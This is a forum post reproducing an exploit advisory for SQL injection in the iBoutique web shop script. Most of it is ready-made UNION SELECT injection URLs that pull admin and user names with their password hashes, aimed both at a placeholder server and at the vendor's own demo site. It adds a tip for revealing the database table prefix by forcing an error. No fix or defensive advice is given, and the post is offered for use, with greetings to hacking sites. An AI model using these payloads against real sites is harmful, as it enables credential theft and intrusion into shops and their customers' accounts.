Jump to content
Gonzalez

iBoutique SQL Injection Vulnerbilitys

Recommended Posts

Posted
--==+================================================================================+==-- 
--==+ iBoutique SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog


SCRIPT DOWNLOAD: N/A


SITE: [url]http://www.wscreator.com[/url]


DORK: N/A

DESCRIPTION: gain MD5 hash of any user including admin

EXPLOITS:

EXPLOIT 1 (admin): [url]http://www.server.com/SCRIPT_PATH/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_admin_users

EXPLOIT 2 (users): [url]http://www.server.com/SCRIPT_PATH/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_users

EXAMPLES:

EXAMPLE 1 ON DEMO: [url]http://www.wscreator.com/iboutique/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_admin_users

EXAMPLE 2 ON DEMO: [url]http://www.wscreator.com/iboutique/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_user

NOTE/TIP: the table prefix may vary on diffrent sites (on demo its 'websiteadmin') to get prefix on other sites, you can cause a error
the following way and show the sql query: http://server.com/iboutique/index.php?page=' that will spew out a error and
you can then see the table prefix

GREETZ: milw0rm.com, H4CKY0u.org, ~removed~ !


--==+================================================================================+==--
--==+ iBoutique SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...